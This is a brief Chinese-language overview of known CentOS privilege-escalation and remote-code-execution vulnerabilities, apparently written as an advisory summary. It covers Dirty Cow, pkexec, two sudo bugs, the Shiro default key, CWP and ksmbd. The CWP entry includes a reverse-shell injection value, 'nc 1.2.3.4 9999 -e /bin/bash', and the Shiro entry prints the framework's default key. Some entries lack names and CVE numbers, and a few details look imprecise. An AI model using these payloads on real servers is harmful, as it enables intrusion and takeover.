CentOS系统常见Exploit漏洞及细节
Dirty Cow是Linux内核处理写时复制(Copy-on-Write)机制时的竞争条件漏洞,影响CentOS所有使用受影响内核版本的系统(如CentOS 6、7等早期版本)。攻击者可通过该漏洞突破只读内存限制,获得root权限,进而完全控制服务器。常见利用方式包括下载编译EXP代码,通过预设密码触发权限提升。
Pkexec是Linux系统用于允许普通用户以root权限执行命令的setuid工具。该漏洞源于其无法正确处理参数数量,会错误地将环境变量当作命令执行。CentOS 6、7、8等多个版本均受影响。攻击者可通过编译运行EXP代码,诱导pkexec执行任意命令,实现系统提权。
该漏洞影响sudo 1.8.9至1.8.23版本(CentOS 7、8等系统常用版本),源于sudo对mail程序路径的验证缺陷。攻击者可通过修改mail程序路径,绕过sudo的身份验证机制,在/etc/passwd文件中添加新用户(如设置空密码的root用户),从而获取系统最高权限。
Apache Shiro是Java应用常用的安全框架,若CentOS系统中的Java应用使用Shiro且未修改默认加密密钥(如使用默认的“kPH+bIxk5D2deZiIxcaaaA==”),攻击者可通过构造特殊请求,绕过身份验证并获取远程shell访问权限。该漏洞无需依赖其他组件,危害极大。
CWP是CentOS系统常用的免费主机控制面板(管理界面默认端口2083)。该漏洞源于文件管理功能的认证绕过(可从URL中移除用户标识符)和命令注入(t_total参数未过滤)。攻击者在知晓任意有效非root用户名的情况下,可通过构造恶意POST请求(如在修改文件权限时注入nc 1.2.3.4 9999 -e /bin/bash),实现未经认证的远程代码执行。影响版本包括0.9.8.1204、0.9.8.1188等,CWP已于2025年6月发布0.9.8.1205版本修复。
ksmd是Linux内核中的SMB服务器实现(替代传统用户空间Samba),用于提供文件共享服务。该漏洞源于smb2_sess_setup函数对Preauth_HashValue字段的处理缺陷,导致竞态条件。攻击者需先通过SMB服务身份验证(需有效凭据),随后利用会话设置过程中的内存破坏,实现内核级任意代码执行。该漏洞CVSS评分为8.5,属于高危漏洞,影响使用ksmbd服务的CentOS系统。
该漏洞影响1.9.17p1之前版本的sudo(CentOS 7、8等系统可能仍在使用),源于sudo对--chroot(-R)选项的处理缺陷。本地攻击者可利用该选项,即使不在sudoers文件中,也能以root身份执行任意命令。CISA已将该漏洞加入“已知被利用漏洞(KEV)”目录,确认其在现实攻击中被利用,风险极高。